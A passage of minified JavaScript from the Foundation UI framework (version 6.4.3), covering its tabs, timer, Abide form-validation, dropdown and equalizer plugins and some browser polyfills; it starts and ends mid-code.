t=e.find('[role="tab"]'),i=t.attr("data-tabs-target")||t[0].hash.slice(1),n=this.$tabContent.find("#"+i);e.addClass(""+this.options.linkActiveClass),t.attr({"aria-selected":"true",tabindex:"0"}),n.addClass(""+this.options.panelActiveClass).removeAttr("aria-hidden")}},{key:"_collapseTab",value:function(e){var t=e.removeClass(""+this.options.linkActiveClass).find('[role="tab"]').attr({"aria-selected":"false",tabindex:-1});r()("#"+t.attr("aria-controls")).removeClass(""+this.options.panelActiveClass).attr({"aria-hidden":"true"})}},{key:"selectTab",value:function(e,t){var i;(i="object"==typeof e?e[0].id:e).indexOf("#")<0&&(i="#"+i);var n=this.$tabTitles.find('[href$="'+i+'"]').parent("."+this.options.linkClass);this._handleTabChange(n,t)}},{key:"_setHeight",value:function(){var n=0,o=this;this.$tabContent.find("."+this.options.panelClass).css("height","").each(function(){var e=r()(this),t=e.hasClass(""+o.options.panelActiveClass);t||e.css({visibility:"hidden",display:"block"});var i=this.getBoundingClientRect().height;t||e.css({visibility:"",display:""}),n=n<i?i:n}).css("height",n+"px")}},{key:"_destroy",value:function(){this.$element.find("."+this.options.linkClass).off(".zf.tabs").hide().end().find("."+this.options.panelClass).hide(),this.options.matchHeight&&null!=this._setHeightMqHandler&&r()(window).off("changed.zf.mediaquery",this._setHeightMqHandler),this.options.deepLink&&r()(window).off("popstate",this._checkDeepLink)}}]),i}();c.defaults={deepLink:!1,deepLinkSmudge:!1,deepLinkSmudgeDelay:300,updateHistory:!1,autoFocus:!1,wrapOnKeys:!0,matchHeight:!1,activeCollapse:!1,linkClass:"tabs-title",linkActiveClass:"is-active",panelClass:"tabs-panel",panelActiveClass:"is-active"}},function(e,t,i){"use strict";function n(t,e,i){var n,o,s=this,a=e.duration,r=Object.keys(t.data())[0]||"timer",l=-1;this.isPaused=!1,this.restart=function(){l=-1,clearTimeout(o),this.start()},this.start=function(){this.isPaused=!1,clearTimeout(o),l=l<=0?a:l,t.data("paused",!1),n=Date.now(),o=setTimeout(function(){e.infinite&&s.restart(),i&&"function"==typeof i&&i()},l),t.trigger("timerstart.zf."+r)},this.pause=function(){this.isPaused=!0,clearTimeout(o),t.data("paused",!0);var e=Date.now();l-=e-n,t.trigger("timerpaused.zf."+r)}}i.d(t,"a",function(){return n});var o=i(0);i.n(o)},function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n=i(0),o=i.n(n),s=i(21),a=i(1),r=i(7),l=i(8),c=i(3),u=i(4),d=i(6),h=i(9),p=i(18),f=i(10),m=i(5),g=i(20),v=i(11),y=i(12),w=i(13),b=i(22),_=i(14),x=i(23),C=i(24),$=i(25),k=i(26),T=i(27),S=i(29),z=i(30),E=i(31),O=i(32),P=i(16),I=i(33),M=i(17),A=i(34),L=i(35),D=i(28);s.a.addToJquery(o.a),s.a.rtl=a.a,s.a.GetYoDigits=a.b,s.a.transitionend=a.c,s.a.Box=r.a,s.a.onImagesLoaded=l.a,s.a.Keyboard=c.a,s.a.MediaQuery=u.a,s.a.Motion=d.a,s.a.Move=d.b,s.a.Nest=h.a,s.a.Timer=p.a,f.a.init(o.a),m.a.init(o.a,s.a),s.a.plugin(g.a,"Abide"),s.a.plugin(v.a,"Accordion"),s.a.plugin(y.a,"AccordionMenu"),s.a.plugin(w.a,"Drilldown"),s.a.plugin(b.a,"Dropdown"),s.a.plugin(_.a,"DropdownMenu"),s.a.plugin(x.a,"Equalizer"),s.a.plugin(C.a,"Interchange"),s.a.plugin($.a,"Magellan"),s.a.plugin(k.a,"OffCanvas"),s.a.plugin(T.a,"Orbit"),s.a.plugin(S.a,"ResponsiveMenu"),s.a.plugin(z.a,"ResponsiveToggle"),s.a.plugin(E.a,"Reveal"),s.a.plugin(O.a,"Slider"),s.a.plugin(P.a,"SmoothScroll"),s.a.plugin(I.a,"Sticky"),s.a.plugin(M.a,"Tabs"),s.a.plugin(A.a,"Toggler"),s.a.plugin(L.a,"Tooltip"),s.a.plugin(D.a,"ResponsiveAccordionTabs")},function(e,t,i){"use strict";i.d(t,"a",function(){return a});var n=i(0),u=i.n(n),o=i(2),s=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),a=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,o["a"]),s(i,[{key:"_setup",value:function(e){var t=1<arguments.length&&void 0!==arguments[1]?arguments[1]:{};this.$element=e,this.options=u.a.extend(!0,{},i.defaults,this.$element.data(),t),this.className="Abide",this._init()}},{key:"_init",value:function(){this.$inputs=this.$element.find("input, textarea, select"),this._events()}},{key:"_events",value:function(){var t=this;this.$element.off(".abide").on("reset.zf.abide",function(){t.resetForm()}).on("submit.zf.abide",function(){return t.validateForm()}),"fieldChange"===this.options.validateOn&&this.$inputs.off("change.zf.abide").on("change.zf.abide",function(e){t.validateInput(u()(e.target))}),this.options.liveValidate&&this.$inputs.off("input.zf.abide").on("input.zf.abide",function(e){t.validateInput(u()(e.target))}),this.options.validateOnBlur&&this.$inputs.off("blur.zf.abide").on("blur.zf.abide",function(e){t.validateInput(u()(e.target))})}},{key:"_reflow",value:function(){this._init()}},{key:"requiredCheck",value:function(e){if(!e.attr("required"))return!0;var t=!0;switch(e[0].type){case"checkbox":t=e[0].checked;break;case"select":case"select-one":case"select-multiple":var i=e.find("option:selected");i.length&&i.val()||(t=!1);break;default:e.val()&&e.val().length||(t=!1)}return t}},{key:"findFormError",value:function(e){var t=e[0].id,i=e.siblings(this.options.formErrorSelector);return i.length||(i=e.parent().find(this.options.formErrorSelector)),i=i.add(this.$element.find('[data-form-error-for="'+t+'"]'))}},{key:"findLabel",value:function(e){var t=e[0].id,i=this.$element.find('label[for="'+t+'"]');return i.length?i:e.closest("label")}},{key:"findRadioLabels",value:function(e){var o=this,t=e.map(function(e,t){var i=t.id,n=o.$element.find('label[for="'+i+'"]');return n.length||(n=u()(t).closest("label")),n[0]});return u()(t)}},{key:"addErrorClasses",value:function(e){var t=this.findLabel(e),i=this.findFormError(e);t.length&&t.addClass(this.options.labelErrorClass),i.length&&i.addClass(this.options.formErrorClass),e.addClass(this.options.inputErrorClass).attr("data-invalid","")}},{key:"removeRadioErrorClasses",value:function(e){var t=this.$element.find(':radio[name="'+e+'"]'),i=this.findRadioLabels(t),n=this.findFormError(t);i.length&&i.removeClass(this.options.labelErrorClass),n.length&&n.removeClass(this.options.formErrorClass),t.removeClass(this.options.inputErrorClass).removeAttr("data-invalid")}},{key:"removeErrorClasses",value:function(e){if("radio"==e[0].type)return this.removeRadioErrorClasses(e.attr("name"));var t=this.findLabel(e),i=this.findFormError(e);t.length&&t.removeClass(this.options.labelErrorClass),i.length&&i.removeClass(this.options.formErrorClass),e.removeClass(this.options.inputErrorClass).removeAttr("data-invalid")}},{key:"validateInput",value:function(e){var t=this.requiredCheck(e),i=!1,n=!0,o=e.attr("data-validator"),s=!0;if(e.is("[data-abide-ignore]")||e.is('[type="hidden"]')||e.is("[disabled]"))return!0;switch(e[0].type){case"radio":i=this.validateRadio(e.attr("name"));break;case"checkbox":i=t;break;case"select":case"select-one":case"select-multiple":i=t;break;default:i=this.validateText(e)}o&&(n=this.matchValidation(e,o,e.attr("required"))),e.attr("data-equalto")&&(s=this.options.validators.equalTo(e));var a=-1===[t,i,n,s].indexOf(!1),r=(a?"valid":"invalid")+".zf.abide";if(a){var l=this.$element.find('[data-equalto="'+e.attr("id")+'"]');if(l.length){var c=this;l.each(function(){u()(this).val()&&c.validateInput(u()(this))})}}return this[a?"removeErrorClasses":"addErrorClasses"](e),e.trigger(r,[e]),a}},{key:"validateForm",value:function(){var e=[],t=this;this.$inputs.each(function(){e.push(t.validateInput(u()(this)))});var i=-1===e.indexOf(!1);return this.$element.find("[data-abide-error]").css("display",i?"none":"block"),this.$element.trigger((i?"formvalid":"forminvalid")+".zf.abide",[this.$element]),i}},{key:"validateText",value:function(e,t){t=t||e.attr("pattern")||e.attr("type");var i=e.val(),n=!1;return i.length?n=this.options.patterns.hasOwnProperty(t)?this.options.patterns[t].test(i):t===e.attr("type")||new RegExp(t).test(i):e.prop("required")||(n=!0),n}},{key:"validateRadio",value:function(e){var t=this.$element.find(':radio[name="'+e+'"]'),i=!1,n=!1;return t.each(function(e,t){u()(t).attr("required")&&(n=!0)}),n||(i=!0),i||t.each(function(e,t){u()(t).prop("checked")&&(i=!0)}),i}},{key:"matchValidation",value:function(t,e,i){var n=this;return i=!!i,-1===e.split(" ").map(function(e){return n.options.validators[e](t,i,t.parent())}).indexOf(!1)}},{key:"resetForm",value:function(){var e=this.$element,t=this.options;u()("."+t.labelErrorClass,e).not("small").removeClass(t.labelErrorClass),u()("."+t.inputErrorClass,e).not("small").removeClass(t.inputErrorClass),u()(t.formErrorSelector+"."+t.formErrorClass).removeClass(t.formErrorClass),e.find("[data-abide-error]").css("display","none"),u()(":input",e).not(":button, :submit, :reset, :hidden, :radio, :checkbox, [data-abide-ignore]").val("").removeAttr("data-invalid"),u()(":input:radio",e).not("[data-abide-ignore]").prop("checked",!1).removeAttr("data-invalid"),u()(":input:checkbox",e).not("[data-abide-ignore]").prop("checked",!1).removeAttr("data-invalid"),e.trigger("formreset.zf.abide",[e])}},{key:"_destroy",value:function(){var e=this;this.$element.off(".abide").find("[data-abide-error]").css("display","none"),this.$inputs.off(".abide").each(function(){e.removeErrorClasses(u()(this))})}}]),i}();a.defaults={validateOn:"fieldChange",labelErrorClass:"is-invalid-label",inputErrorClass:"is-invalid-input",formErrorSelector:".form-error",formErrorClass:"is-visible",liveValidate:!1,validateOnBlur:!1,patterns:{alpha:/^[a-zA-Z]+$/,alpha_numeric:/^[a-zA-Z0-9]+$/,integer:/^[-+]?\d+$/,number:/^[-+]?\d*(?:[\.\,]\d+)?$/,card:/^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|(?:222[1-9]|2[3-6][0-9]{2}|27[0-1][0-9]|2720)[0-9]{12}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$/,cvv:/^([0-9]){3,4}$/,email:/^[a-zA-Z0-9.!#$%&'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)+$/,url:/^(https?|ftp|file|ssh):\/\/(((([a-zA-Z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:)*@)?(((\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]))|((([a-zA-Z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-zA-Z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-zA-Z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-zA-Z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-zA-Z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-zA-Z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-zA-Z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-zA-Z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?)(:\d*)?)(\/((([a-zA-Z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)+(\/(([a-zA-Z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)*)*)?)?(\?((([a-zA-Z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)|[\uE000-\uF8FF]|\/|\?)*)?(\#((([a-zA-Z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(%[\da-f]{2})|[!\$&'\(\)\*\+,;=]|:|@)|\/|\?)*)?$/,domain:/^([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,8}$/,datetime:/^([0-2][0-9]{3})\-([0-1][0-9])\-([0-3][0-9])T([0-5][0-9])\:([0-5][0-9])\:([0-5][0-9])(Z|([\-\+]([0-1][0-9])\:00))$/,date:/(?:19|20)[0-9]{2}-(?:(?:0[1-9]|1[0-2])-(?:0[1-9]|1[0-9]|2[0-9])|(?:(?!02)(?:0[1-9]|1[0-2])-(?:30))|(?:(?:0[13578]|1[02])-31))$/,time:/^(0[0-9]|1[0-9]|2[0-3])(:[0-5][0-9]){2}$/,dateISO:/^\d{4}[\/\-]\d{1,2}[\/\-]\d{1,2}$/,month_day_year:/^(0[1-9]|1[012])[- \/.](0[1-9]|[12][0-9]|3[01])[- \/.]\d{4}$/,day_month_year:/^(0[1-9]|[12][0-9]|3[01])[- \/.](0[1-9]|1[012])[- \/.]\d{4}$/,color:/^#?([a-fA-F0-9]{6}|[a-fA-F0-9]{3})$/,website:{test:function(e){return a.defaults.patterns.domain.test(e)||a.defaults.patterns.url.test(e)}}},validators:{equalTo:function(e,t,i){return u()("#"+e.attr("data-equalto")).val()===e.val()}}}},function(e,t,n){"use strict";function a(e){if(void 0===Function.prototype.name){var t=/function\s([^(]{1,})\(/.exec(e.toString());return t&&1<t.length?t[1].trim():""}return void 0===e.prototype?e.constructor.name:e.prototype.constructor.name}function o(e){return e.replace(/([a-z])([A-Z])/g,"$1-$2").toLowerCase()}n.d(t,"a",function(){return c});var i=n(0),s=n.n(i),r=n(1),l=n(4),c={version:"6.4.3",_plugins:{},_uuids:[],plugin:function(e,t){var i=t||a(e),n=o(i);this._plugins[n]=this[i]=e},registerPlugin:function(e,t){var i=t?o(t):a(e.constructor).toLowerCase();e.uuid=n.i(r.b)(6,i),e.$element.attr("data-"+i)||e.$element.attr("data-"+i,e.uuid),e.$element.data("zfPlugin")||e.$element.data("zfPlugin",e),e.$element.trigger("init.zf."+i),this._uuids.push(e.uuid)},unregisterPlugin:function(e){var t=o(a(e.$element.data("zfPlugin").constructor));for(var i in this._uuids.splice(this._uuids.indexOf(e.uuid),1),e.$element.removeAttr("data-"+t).removeData("zfPlugin").trigger("destroyed.zf."+t),e)e[i]=null},reInit:function(e){var t=e instanceof s.a;try{if(t)e.each(function(){s()(this).data("zfPlugin")._init()});else{var i=this;({object:function(e){e.forEach(function(e){e=o(e),s()("[data-"+e+"]").foundation("_init")})},string:function(){e=o(e),s()("[data-"+e+"]").foundation("_init")},undefined:function(){this.object(Object.keys(i._plugins))}})[typeof e](e)}}catch(e){console.error(e)}finally{return e}},reflow:function(n,e){void 0===e?e=Object.keys(this._plugins):"string"==typeof e&&(e=[e]);var o=this;s.a.each(e,function(e,t){var i=o._plugins[t];s()(n).find("[data-"+t+"]").addBack("[data-"+t+"]").each(function(){var e=s()(this),o={};if(e.data("zfPlugin"))console.warn("Tried to initialize "+t+" on an element that already has a Foundation plugin.");else{if(e.attr("data-options"))e.attr("data-options").split(";").forEach(function(e,t){var i,n=e.split(":").map(function(e){return e.trim()});n[0]&&(o[n[0]]="true"===(i=n[1])||"false"!==i&&(isNaN(1*i)?i:parseFloat(i)))});try{e.data("zfPlugin",new i(s()(this),o))}catch(e){console.error(e)}finally{return}}})})},getFnName:a,addToJquery:function(s){return s.fn.foundation=function(i){var e=typeof i,t=s(".no-js");if(t.length&&t.removeClass("no-js"),"undefined"===e)l.a._init(),c.reflow(this);else{if("string"!==e)throw new TypeError("We're sorry, "+e+" is not a valid parameter. You must use a string representing the method you wish to invoke.");var n=Array.prototype.slice.call(arguments,1),o=this.data("zfPlugin");if(void 0===o||void 0===o[i])throw new ReferenceError("We're sorry, '"+i+"' is not an available method for "+(o?a(o):"this element")+".");1===this.length?o[i].apply(o,n):this.each(function(e,t){o[i].apply(s(t).data("zfPlugin"),n)})}return this},s}};c.util={throttle:function(i,n){var o=null;return function(){var e=this,t=arguments;null===o&&(o=setTimeout(function(){i.apply(e,t),o=null},n))}}},window.Foundation=c,function(){Date.now&&window.Date.now||(window.Date.now=Date.now=function(){return(new Date).getTime()});for(var e=["webkit","moz"],t=0;t<e.length&&!window.requestAnimationFrame;++t){var i=e[t];window.requestAnimationFrame=window[i+"RequestAnimationFrame"],window.cancelAnimationFrame=window[i+"CancelAnimationFrame"]||window[i+"CancelRequestAnimationFrame"]}if(/iP(ad|hone|od).*OS 6/.test(window.navigator.userAgent)||!window.requestAnimationFrame||!window.cancelAnimationFrame){var n=0;window.requestAnimationFrame=function(e){var t=Date.now(),i=Math.max(n+16,t);return setTimeout(function(){e(n=i)},i-t)},window.cancelAnimationFrame=clearTimeout}window.performance&&window.performance.now||(window.performance={start:Date.now(),now:function(){return Date.now()-this.start}})}(),Function.prototype.bind||(Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=Array.prototype.slice.call(arguments,1),i=this,n=function(){},o=function(){return i.apply(this instanceof n?this:e,t.concat(Array.prototype.slice.call(arguments)))};return this.prototype&&(n.prototype=this.prototype),o.prototype=new n,o})},function(e,t,n){"use strict";n.d(t,"a",function(){return d});var i=n(0),o=n.n(i),s=n(3),a=n(1),r=n(15),l=n(5),c=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),u=function e(t,i,n){null===t&&(t=Function.prototype);var o=Object.getOwnPropertyDescriptor(t,i);if(void 0===o){var s=Object.getPrototypeOf(t);return null===s?void 0:e(s,i,n)}if("value"in o)return o.value;var a=o.get;return void 0!==a?a.call(n):void 0},d=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,r["a"]),c(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=o.a.extend({},i.defaults,this.$element.data(),t),this.className="Dropdown",l.a.init(o.a),this._init(),s.a.register("Dropdown",{ENTER:"open",SPACE:"open",ESCAPE:"close"})}},{key:"_init",value:function(){var e=this.$element.attr("id");this.$anchors=o()('[data-toggle="'+e+'"]').length?o()('[data-toggle="'+e+'"]'):o()('[data-open="'+e+'"]'),this.$anchors.attr({"aria-controls":e,"data-is-focus":!1,"data-yeti-box":e,"aria-haspopup":!0,"aria-expanded":!1}),this._setCurrentAnchor(this.$anchors.first()),this.options.parentClass?this.$parent=this.$element.parents("."+this.options.parentClass):this.$parent=null,this.$element.attr({"aria-hidden":"true","data-yeti-box":e,"data-resize":e,"aria-labelledby":this.$currentAnchor.id||n.i(a.b)(6,"dd-anchor")}),u(i.prototype.__proto__||Object.getPrototypeOf(i.prototype),"_init",this).call(this),this._events()}},{key:"_getDefaultPosition",value:function(){var e=this.$element[0].className.match(/(top|left|right|bottom)/g);return e?e[0]:"bottom"}},{key:"_getDefaultAlignment",value:function(){var e=/float-(\S+)/.exec(this.$currentAnchor.className);return e?e[1]:u(i.prototype.__proto__||Object.getPrototypeOf(i.prototype),"_getDefaultAlignment",this).call(this)}},{key:"_setPosition",value:function(){u(i.prototype.__proto__||Object.getPrototypeOf(i.prototype),"_setPosition",this).call(this,this.$currentAnchor,this.$element,this.$parent)}},{key:"_setCurrentAnchor",value:function(e){this.$currentAnchor=o()(e)}},{key:"_events",value:function(){var i=this;this.$element.on({"open.zf.trigger":this.open.bind(this),"close.zf.trigger":this.close.bind(this),"toggle.zf.trigger":this.toggle.bind(this),"resizeme.zf.trigger":this._setPosition.bind(this)}),this.$anchors.off("click.zf.trigger").on("click.zf.trigger",function(){i._setCurrentAnchor(this)}),this.options.hover&&(this.$anchors.off("mouseenter.zf.dropdown mouseleave.zf.dropdown").on("mouseenter.zf.dropdown",function(){i._setCurrentAnchor(this);var e=o()("body").data();void 0!==e.whatinput&&"mouse"!==e.whatinput||(clearTimeout(i.timeout),i.timeout=setTimeout(function(){i.open(),i.$anchors.data("hover",!0)},i.options.hoverDelay))}).on("mouseleave.zf.dropdown",function(){clearTimeout(i.timeout),i.timeout=setTimeout(function(){i.close(),i.$anchors.data("hover",!1)},i.options.hoverDelay)}),this.options.hoverPane&&this.$element.off("mouseenter.zf.dropdown mouseleave.zf.dropdown").on("mouseenter.zf.dropdown",function(){clearTimeout(i.timeout)}).on("mouseleave.zf.dropdown",function(){clearTimeout(i.timeout),i.timeout=setTimeout(function(){i.close(),i.$anchors.data("hover",!1)},i.options.hoverDelay)})),this.$anchors.add(this.$element).on("keydown.zf.dropdown",function(e){var t=o()(this);s.a.findFocusable(i.$element);s.a.handleKey(e,"Dropdown",{open:function(){t.is(i.$anchors)&&(i.open(),i.$element.attr("tabindex",-1).focus(),e.preventDefault())},close:function(){i.close(),i.$anchors.focus()}})})}},{key:"_addBodyHandler",value:function(){var t=o()(document.body).not(this.$element),i=this;t.off("click.zf.dropdown").on("click.zf.dropdown",function(e){i.$anchors.is(e.target)||i.$anchors.find(e.target).length||i.$element.find(e.target).length||(i.close(),t.off("click.zf.dropdown"))})}},{key:"open",value:function(){if(this.$element.trigger("closeme.zf.dropdown",this.$element.attr("id")),this.$anchors.addClass("hover").attr({"aria-expanded":!0}),this.$element.addClass("is-opening"),this._setPosition(),this.$element.removeClass("is-opening").addClass("is-open").attr({"aria-hidden":!1}),this.options.autoFocus){var e=s.a.findFocusable(this.$element);e.length&&e.eq(0).focus()}this.options.closeOnClick&&this._addBodyHandler(),this.options.trapFocus&&s.a.trapFocus(this.$element),this.$element.trigger("show.zf.dropdown",[this.$element])}},{key:"close",value:function(){if(!this.$element.hasClass("is-open"))return!1;this.$element.removeClass("is-open").attr({"aria-hidden":!0}),this.$anchors.removeClass("hover").attr("aria-expanded",!1),this.$element.trigger("hide.zf.dropdown",[this.$element]),this.options.trapFocus&&s.a.releaseFocus(this.$element)}},{key:"toggle",value:function(){if(this.$element.hasClass("is-open")){if(this.$anchors.data("hover"))return;this.close()}else this.open()}},{key:"_destroy",value:function(){this.$element.off(".zf.trigger").hide(),this.$anchors.off(".zf.dropdown"),o()(document.body).off("click.zf.dropdown")}}]),i}();d.defaults={parentClass:null,hoverDelay:250,hover:!1,hoverPane:!1,vOffset:0,hOffset:0,positionClass:"",position:"auto",alignment:"auto",allowOverlap:!1,allowBottomOverlap:!0,trapFocus:!1,autoFocus:!1,closeOnClick:!1}},function(e,t,o){"use strict";o.d(t,"a",function(){return c});var i=o(0),d=o.n(i),s=o(4),a=o(8),r=o(1),n=o(2),l=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),c=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,n["a"]),l(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=d.a.extend({},i.defaults,this.$element.data(),t),this.className="Equalizer",this._init()}},{key:"_init",value:function(){var e=this.$element.attr("data-equalizer")||"",t=this.$element.find('[data-equalizer-watch="'+e+'"]');s.a._init(),this.$watched=t.length?t:this.$element.find("[data-equalizer-watch]"),this.$element.attr("data-resize",e||o.i(r.b)(6,"eq")),this.$element.attr("data-mutate",e||o.i(r.b)(6,"eq")),this.hasNested=0<this.$element.find("[data-equalizer]").length,this.isNested=0<this.$element.parentsUntil(document.body,"[data-equalizer]").length,this.isOn=!1,this._bindHandler={onResizeMeBound:this._onResizeMe.bind(this),onPostEqualizedBound:this._onPostEqualized.bind(this)};var i,n=this.$element.find("img");this.options.equalizeOn?(i=this._checkMQ(),d()(window).on("changed.zf.mediaquery",this._checkMQ.bind(this))):this._events(),(void 0!==i&&!1===i||void 0===i)&&(n.length?o.i(a.a)(n,this._reflow.bind(this)):this._reflow())}},{key:"_pauseEvents",value:function(){this.isOn=!1,this.$element.off({".zf.equalizer":this._bindHandler.onPostEqualizedBound,"resizeme.zf.trigger":this._bindHandler.onResizeMeBound,"mutateme.zf.trigger":this._bindHandler.onResizeMeBound})}},{key:"_onResizeMe",value:function(e){this._reflow()}},{key:"_onPostEqualized",value:function(e){e.target!==this.$element[0]&&this._reflow()}},{key:"_events",value:function(){this._pauseEvents(),this.hasNested?this.$element.on("postequalized.zf.equalizer",this._bindHandler.onPostEqualizedBound):(this.$element.on("resizeme.zf.trigger",this._bindHandler.onResizeMeBound),this.$element.on("mutateme.zf.trigger",this._bindHandler.onResizeMeBound)),this.isOn=!0}},{key:"_checkMQ",value:function(){var e=!s.a.is(this.options.equalizeOn);return e?this.isOn&&(this._pauseEvents(),this.$watched.css("height","auto")):this.isOn||this._events(),e}},{key:"_killswitch",value:function(){}},{key:"_reflow",value:function(){if(!this.options.equalizeOnStack&&this._isStacked())return this.$watched.css("height","auto"),!1;this.options.equalizeByRow?this.getHeightsByRow(this.applyHeightByRow.bind(this)):this.getHeights(this.applyHeight.bind(this))}},{key:"_isStacked",value:function(){return!this.$watched[0]||!this.$watched[1]||this.$watched[0].getBoundingClientRect().top!==this.$watched[1].getBoundingClientRect().top}},{key:"getHeights",value:function(e){for(var t=[],i=0,n=this.$watched.length;i<n;i++)this.$watched[i].style.height="auto",t.push(this.$watched[i].offsetHeight);e(t)}},{key:"getHeightsByRow",value:function(e){var t=this.$watched.length?this.$watched.first().offset().top:0,i=[],n=0;i[n]=[];for(var o=0,s=this.$watched.length;o<s;o++){this.$watched[o].style.height="auto";var a=d()(this.$watched[o]).offset().top;a!=t&&(i[++n]=[],t=a),i[n].push([this.$watched[o],this.$watched[o].offsetHeight])}for(var r=0,l=i.length;r<l;r++){var c=d()(i[r]).map(function(){return this[1]}).get(),u=Math.max.apply(null,c);i[r].push(u)}e(i)}},{key:"applyHeight",value:function(e){var t=Math.max.apply(null,e);this.$element.trigger("preequalized.zf.equalizer"),this.$watched.css("height",t),this.$element.trigger("postequalized.zf.equalizer")}},{key:"applyHeightByRow",value:function(e){this.$element.trigger("preequalized.zf.equalizer");for(var t=0,i=e.length;t<i;t++){var n=e[t].length,o=e[t][n-1];if(n<=2)d()(e[t][0][0]).css({height:"auto"});else{this.$element.trigger("preequalizedrow.zf.equalizer");for(var s=0,a=n-1;s<a;s++)d()(e[t][s][0]).css({height:o});this.$element.trigger("postequalizedrow.zf.equalizer")}}this.$element.trigger("postequalized.zf.equalizer")}},{key:"_destroy",value:function(){this._pauseEvents(),this.$watched.css("height","auto")}}]),i}();c.defaults={equalizeOnStack:!1,equalizeByRow:!1,equalizeOn:""}},function(e,t,i){"use strict";i.d(t,"a",function(){return r});var n=i(0),o=i.n(n),s=i(4),a=i(2),l=i(1),c=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),r=function(e){function r(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,r),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof 